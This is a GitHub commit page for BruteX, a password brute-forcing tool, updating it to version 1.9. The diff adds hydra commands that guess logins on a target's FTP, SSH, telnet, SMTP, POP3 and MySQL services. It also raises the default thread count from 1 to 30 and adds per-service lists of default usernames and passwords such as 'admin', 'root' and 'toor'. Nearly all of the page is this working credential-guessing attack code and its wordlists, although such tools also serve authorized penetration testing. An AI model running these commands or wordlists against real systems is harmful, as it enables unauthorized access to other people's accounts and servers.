Skip to content

Commit

Permalink
BruteX by @xer0dayz https://xerosecurity.com
Browse files Browse the repository at this point in the history
  • Loading branch information
WP Engine Marketing committed Dec 4, 2018
1 parent 2d77a5b commit ce83ddb
Show file tree
Hide file tree
Showing 16 changed files with 332 additions and 2 deletions.
1 change: 1 addition & 0 deletions CHANGELOG.md
View file
Original file line number Diff line number Diff line change
@@ -1,4 +1,5 @@
## CHANGELOG:
* v1.9 Updated default credential lists for each service
* v1.8 Added improved default credential list for each service
* v1.7 Removed DNS brute forcing
* v1.7 Added -P0 to NMap scan options
Expand Down
22 changes: 20 additions & 2 deletions brutex
View file
Original file line number Diff line number Diff line change
Expand Up @@ -17,11 +17,23 @@

TARGET="$1"
PORT="$2"
VER="1.8"
VER="1.9"
LOOT_DIR=/usr/share/brutex/loot
FTP_USER_PASS="/usr/share/brutex/wordlists/ftp-default-userpass.txt"
FTP_USERS="/usr/share/brutex/wordlists/ftp_defuser.lst"
FTP_PASS="/usr/share/brutex/wordlists/ftp_defpass.lst"
SSH_USER_PASS="/usr/share/brutex/wordlists/ssh-default-userpass.txt"
SSH_USERS="/usr/share/brutex/wordlists/ssh_defuser.lst"
SSH_PASS="/usr/share/brutex/wordlists/ssh_defpass.lst"
SMTP_USERS="/usr/share/brutex/wordlists/smtp_defuser.lst"
SMTP_PASS="/usr/share/brutex/wordlists/smtp_defpass.lst"
POP_USERS="/usr/share/brutex/wordlists/pop_defusers.lst"
POP_PASS="/usr/share/brutex/wordlists/pop_defpass.lst"
TELNET_USER_PASS="/usr/share/brutex/wordlists/telnet-default-userpass.txt"
TELNET_USERS="/usr/share/brutex/wordlists/telnet_defuser.lst"
TELNET_PASS="/usr/share/brutex/wordlists/telnet_defpass.lst"
SQL_USERS="/usr/share/brutex/wordlists/sql_defuser.lst"
SQL_PASS="/usr/share/brutex/wordlists/sql_defpass.lst"
MSSQL_USER_PASS="/usr/share/brutex/wordlists/mssql-default-userpass.txt"
MYSQL_USER_PASS="/usr/share/brutex/wordlists/mysql-default-userpass.txt"
ORACLE_USER_PASS="/usr/share/brutex/wordlists/oracle-default-userpass.txt"
Expand All @@ -33,7 +45,7 @@ PASS_FILE="/usr/share/brutex/wordlists/password.lst"
SNMP_FILE="/usr/share/brutex/wordlists/snmp-strings.txt"
VNC_FILE="/usr/share/brutex/wordlists/vnc-default-passwords.txt"
HTTP_LOCATION="/"
THREADS="1"
THREADS="30"
COLOR1='\033[91m'
COLOR2='\033[92m'
COLOR3='\033[92m'
Expand Down Expand Up @@ -113,6 +125,7 @@ then
else
echo -e "$COLOR2 + -- --=[Port 21 opened... running tests...$RESET"
hydra -C $FTP_USER_PASS $TARGET ftp -t $THREADS -e ns
hydra -L $FTP_USERS -P $FTP_PASS $TARGET ftp -t $THREADS -e ns
fi

if [ -z "$port_22" ]
Expand All @@ -122,6 +135,7 @@ else
echo -e "$COLOR2 + -- --=[Port 22 opened... running tests...$RESET"
hydra -C $SSH_USER_PASS $TARGET ssh -t $THREADS -e ns
hydra -L $USER_FILE -P $PASS_FILE $TARGET ssh -t $THREADS -e ns
hydra -L $SSH_USERS -P $SSH_PASS $TARGET ssh -t $THREADS -e ns
fi

if [ -z "$port_23" ]
Expand All @@ -131,6 +145,7 @@ else
echo -e "$COLOR2 + -- --=[Port 23 opened... running tests...$RESET"
hydra -C $TELNET_USER_PASS $TARGET telnet -t $THREADS -e ns
hydra -L $USER_FILE -P $PASS_FILE $TARGET telnet -t $THREADS -e ns
hydra -L $TELNET_USERS -P $TELNET_PASS $TARGET telnet -t $THREADS -e ns
fi

if [ -z "$port_25" ]
Expand All @@ -140,6 +155,7 @@ else
echo -e "$COLOR2 + -- --=[Port 25 opened... running tests...$RESET"
hydra -L $USER_FILE -P $PASS_FILE $TARGET smtp-enum -t $THREADS -e ns
hydra -L $USER_FILE -P $PASS_FILE $TARGET smtp -t $THREADS -e ns
hydra -L $SMTP_USERS -P $SMTP_PASS $TARGET smtp -t $THREADS -e ns
fi

if [ -z "$port_80" ]
Expand All @@ -156,6 +172,7 @@ then
else
echo -e "$COLOR2 + -- --=[Port 110 opened... running tests...$RESET"
hydra -L $USER_FILE -P $PASS_FILE $TARGET pop3 -t $THREADS -e ns
hydra -L $POP_USERS -P $POP_PASS $TARGET pop3 -t $THREADS -e ns
fi

if [ -z "$port_139" ]
Expand Down Expand Up @@ -255,6 +272,7 @@ then
else
echo -e "$COLOR2 + -- --=[Port 3306 opened... running tests...$RESET"
hydra -C $MYSQL_USER_PASS $TARGET mysql -t $THREADS -e ns
hydra -L $SQL_USERS -P $SQL_PASS $TARGET mysql -t $THREADS -e ns
fi

if [ -z "$port_3389" ]
Expand Down
24 changes: 24 additions & 0 deletions wordlists/ftp_defpass.lst
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,24 @@
admin
password

manager
letmein
cisco
default
root
apc
pass
security
user
system
sys
none
toor
ftp
ftp123
ftpadmin
apc
pass123
security
user
sys
21 changes: 21 additions & 0 deletions wordlists/ftp_defuser.lst
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,21 @@
admin
manager
role1
root
system

ftp
root
r00t
ftp123
ftpadmin
sysadmin
25
587
ftp-587
cisco
apc
pass
security
user
sys
24 changes: 24 additions & 0 deletions wordlists/pop_defpass.lst
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,24 @@
admin
password

manager
letmein
cisco
default
root
apc
pass
security
user
system
sys
none
toor
pop
pop123
popadmin
apc
pass123
security
user
sys
21 changes: 21 additions & 0 deletions wordlists/pop_defuser.lst
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,21 @@
admin
manager
role1
root
system

pop
root
r00t
pop123
popadmin
sysadmin
25
587
pop-587
cisco
apc
pass
security
user
sys
24 changes: 24 additions & 0 deletions wordlists/smtp_defpass.lst
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,24 @@
admin
password

manager
letmein
cisco
default
root
apc
pass
security
user
system
sys
none
toor
smtp
smtp123
smtpadmin
apc
pass123
security
user
sys
21 changes: 21 additions & 0 deletions wordlists/smtp_defuser.lst
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,21 @@
admin
manager
role1
root
system

smtp
root
r00t
smtp123
smtpadmin
sysadmin
25
587
smtp-587
cisco
apc
pass
security
user
sys
24 changes: 24 additions & 0 deletions wordlists/sql_defpass.lst
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,24 @@
admin
password

manager
letmein
cisco
default
root
apc
pass
security
user
system
sys
none
toor
sql
sql123
sqladmin
apc
pass123
security
user
sys
21 changes: 21 additions & 0 deletions wordlists/sql_defuser.lst
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,21 @@
admin
manager
role1
root
system

sql
root
r00t
sql123
sqladmin
sysadmin
25
587
sql-587
cisco
apc
pass
security
user
sys
24 changes: 24 additions & 0 deletions wordlists/ssh_defpass.lst
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,24 @@
admin
password

manager
letmein
cisco
default
root
apc
pass
security
user
system
sys
none
toor
ssh
ssh123
sshadmin
apc
pass123
security
user
sys
21 changes: 21 additions & 0 deletions wordlists/ssh_defuser.lst
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,21 @@
admin
manager
role1
root
system

ssh
root
r00t
ssh123
sshadmin
sysadmin
25
587
ssh-587
cisco
apc
pass
security
user
sys
25 changes: 25 additions & 0 deletions wordlists/telnet_defpass.lst
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,25 @@
admin
password

manager
letmein
cisco
default
root
apc
pass
security
user
system
sys
none
toor
telnet
tel123
cisco
apc
telnetadmin
pass
security
user
sys
17 changes: 17 additions & 0 deletions wordlists/telnet_defuser.lst
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,17 @@
manager
role1
admin
root
system

telnet
root
r00t
tel123
telnetadmin
cisco
apc
pass
security
user
sys
25 changes: 25 additions & 0 deletions wordlists/xmpp_defpass.lst
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,25 @@
admin
password

manager
letmein
cisco
default
root
apc
pass
security
xmpp
xmppadmin
xmpp123
user
system
sys
none
toorxmpp
apc
pass
pass123
security
user
sys
Loading

0 comments on commit ce83ddb

Please sign in to comment.